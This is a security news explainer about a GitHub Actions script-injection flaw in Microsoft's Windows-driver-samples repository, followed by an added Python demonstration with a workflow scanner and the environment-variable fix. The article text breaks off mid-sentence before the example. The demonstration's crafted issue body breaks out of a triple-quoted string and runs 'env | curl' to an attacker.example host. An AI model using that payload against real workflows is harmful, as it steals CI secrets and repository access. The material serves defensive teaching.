Tenable finds GitHub workflow flaw
- Tenable disclosed a critical GitHub Actions flaw in Microsoft’s public Windows-driver-samples repository after Microsoft fixed it in late March 2026.
- The bug let any GitHub user open a malicious issue, break out of an inline Python string literal, run code on the workflow runner, and steal the secrets available to that run.
- It matters because CI workflows now sit on the supply-chain edge, not behind it, and sample repos get copied everywhere.
GitHub Actions is supposed to be plumbing. It files labels, runs tests, tags owners, and generally stays out of sight. The point of this Tenable finding is that the plumbing was reachable from the outside: in Microsoft’s public Windows-driver-samples repository, an ordinary GitHub issue could become code execution on the workflow runner. Tenable disclosed the bug after Microsoft patched it, with the fix confirmed on March 30, 2026.

### What actually broke?

A workflow in the repository’s `.github/workflows/tag-codeowner-on-issue.yml` file took the text of a GitHub issue body and pasted it directly into an inline Python script. That is the dangerous pattern. GitHub evaluates the `${{ ... }}` expression and substitutes its value into the script text before the script runs, so untrusted user input becomes part of the program rather than data the program reads. Security researchers call this script injection.

### How could a random user exploit that?

The issue body was wrapped in Python triple quotes. Tenable showed that an attacker could submit an issue whose body contained its own triple quotes, terminate the string literal early, and follow it with arbitrary Python statements that the runner would then execute. No special repository access was needed: a regular GitHub account and the ability to open an issue were enough, because the workflow itself provided an execution path from public input straight into automation.

### Why is runner code execution a big deal?

Because the runner is not just a scratch machine. Workflows often carry credentials, temporary tokens, API access, and permissions to act on the repository. Tenable said an attacker could exfiltrate secrets available to the workflow run and perform unauthorized operations on the target repository. Those tokens are meant for automation, but they still authenticate requests within whatever permissions the repository grants the workflow.

### Was this some obscure corner case?

Not really. The repository is Microsoft’s public Windows driver samples repo, a well-known reference project with about 7,700 stars and 5,000 forks. That matters because sample repos are not just demos. Teams copy them, borrow workflow patterns from them, and sometimes build internal automation around them. A mistake in a reference repository does not stay a one-off bug; it gets copied along with everything else.

### Didn’t GitHub already warn about this pattern?

Yes, and that is part of the story. GitHub has warned for years against injecting untrusted context values such as issue bodies, pull request titles, or comments directly into inline scripts. The safer pattern is to pass untrusted data through an environment variable or another intermediary, so the script receives it as data and never as part of its own source. GitHub has published multiple guides on finding and preventing workflow injections.

### What did Microsoft and Tenable do?

Tenable reported the issue to Microsoft on February 24, 2026. Microsoft confirmed the behavior on March 13, a pull request appeared in the repository, and Microsoft confirmed the fix on March 30. Tenable then published its advisory. That timeline matters because it shows a normal coordinated disclosure cycle, not a public fight over the bug.

### So what is the real lesson here?

Treat workflow files like internet-facing code. Basically, they
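The injection pattern, the environment-variable fix, and a quick check for the anti-pattern, as an added example. This is not code from the article, from Tenable, or from the Windows-driver-samples repository: the script and workflow snippets reconstruct the shape the article describes (a triple-quoted interpolation of `github.event.issue.body` into an inline Python script), not the real file's contents. The `ISSUE_BODY` variable name, the `area:` label convention, the two issue bodies, the heredoc form, and the scanner's list of untrusted contexts (a partial list drawn from GitHub's published guidance) are all assumptions or constructed inputs.

```python
"""Added example (not code from the article, Tenable, or Microsoft). It shows
why splicing `${{ github.event.issue.body }}` into an inline Python script is
code injection, how the env-variable pattern fixes it, and a small scanner for
the anti-pattern. The workflow snippets reconstruct the pattern the article
describes; they are not the repository's real file, and all inputs are constructed."""
import ast
import os
import re

EXPR = re.compile(r"\$\{\{\s*([\w.\-]+)\s*\}\}")

# Reconstructed vulnerable script: the expression is expanded into the source text.
VULNERABLE_RUN = '''body = """${{ github.event.issue.body }}"""
labels = sorted(w for w in body.split() if w.startswith("area:"))
'''

# Hardened script: the expression is bound under `env:`, the script reads it as data.
HARDENED_RUN = '''import os
body = os.environ["ISSUE_BODY"]
labels = sorted(w for w in body.split() if w.startswith("area:"))
'''

# Constructed issue bodies. The malicious one closes the triple-quoted literal,
# adds its own statements, then reopens a literal so the template still parses.
HONEST_BODY = "Driver crashes on resume, area:power area:usb"
MALICIOUS_BODY = '"""\nimport os\nos.system("env | curl -d @- https://attacker.example")\n_ = """'


def expand(template: str, github_event: dict) -> str:
    """Emulates the runner's pre-execution substitution: plain text replacement
    with no quoting or escaping, which is exactly the property attackers abuse."""
    def lookup(m):
        node = {"github": {"event": github_event}}
        for part in m.group(1).split("."):
            node = node[part]
        return str(node)
    return EXPR.sub(lookup, template)


def top_level_statements(template: str, issue_body: str) -> list[str]:
    """Statements Python would actually execute after expansion. An honest body
    yields the template's own statements; a crafted body adds the attacker's."""
    script = expand(template, {"issue": {"body": issue_body}})
    return [ast.unparse(node) for node in ast.parse(script).body]


def run_hardened(issue_body: str) -> list[str]:
    """Runs the hardened script with the body delivered through the environment,
    as `env: ISSUE_BODY: ${{ github.event.issue.body }}` would. The script text
    never contains the body, so triple quotes in it are just characters."""
    os.environ["ISSUE_BODY"] = issue_body
    namespace: dict = {}
    exec(HARDENED_RUN, namespace)
    return namespace["labels"]


# Partial list of contexts GitHub's guidance treats as attacker-controlled.
UNTRUSTED = re.compile(
    r"^github\.(event\.(issue|pull_request|comment|review|review_comment|discussion)"
    r"\.(title|body)|head_ref|event\.pull_request\.head\.(ref|label))$"
)


def scan_workflow(yaml_text: str) -> list[tuple[int, str]]:
    """Flags untrusted-context expressions inside `run:` scripts. Deliberately
    line-based so it needs no YAML library: fine for a pre-commit check, not a
    replacement for a real parser. Expressions under `env:` are not flagged."""
    findings, run_indent = [], None
    for lineno, line in enumerate(yaml_text.splitlines(), 1):
        indent = len(line) - len(line.lstrip())
        if run_indent is not None and line.strip() and indent <= run_indent:
            run_indent = None  # a sibling key ended the run: block
        m = re.match(r"^(\s*)(-\s+)?run:", line)
        if m:
            run_indent = len(m.group(1)) + len(m.group(2) or "")
        if run_indent is not None:
            findings += [(lineno, e) for e in EXPR.findall(line) if UNTRUSTED.match(e)]
    return findings


# Reconstructed workflows. Quoting the heredoc delimiter does not help: the
# runner expands `${{ }}` before the shell or Python ever sees the text.
VULNERABLE_WORKFLOW = '''on:
  issues:
    types: [opened]
jobs:
  tag:
    runs-on: ubuntu-latest
    steps:
      - run: |
          python - <<'EOF'
          body = """${{ github.event.issue.body }}"""
          print(body)
          EOF
'''
HARDENED_WORKFLOW = '''on:
  issues:
    types: [opened]
jobs:
  tag:
    runs-on: ubuntu-latest
    steps:
      - env:
          ISSUE_BODY: ${{ github.event.issue.body }}
        run: |
          python - <<'EOF'
          import os
          body = os.environ["ISSUE_BODY"]
          print(body)
          EOF
'''

if __name__ == "__main__":
    for stmt in top_level_statements(VULNERABLE_RUN, MALICIOUS_BODY):
        print("would execute:", stmt)
    print("hardened labels:", run_hardened(MALICIOUS_BODY))
    print("findings:", scan_workflow(VULNERABLE_WORKFLOW), scan_workflow(HARDENED_WORKFLOW))
```

Run as a script, it prints the five statements the runner would execute for the crafted body (the template's two plus `import os`, the `os.system` call, and the attacker's closing assignment), shows that the same body fed through `ISSUE_BODY` produces no labels and no side effects, and reports one finding for the vulnerable workflow and none for the hardened one. Pointing `scan_workflow` at each file under `.github/workflows/` is the cheapest version of the "find workflow injections" advice GitHub has been giving; anything it flags should be moved into `env:` and read from the environment.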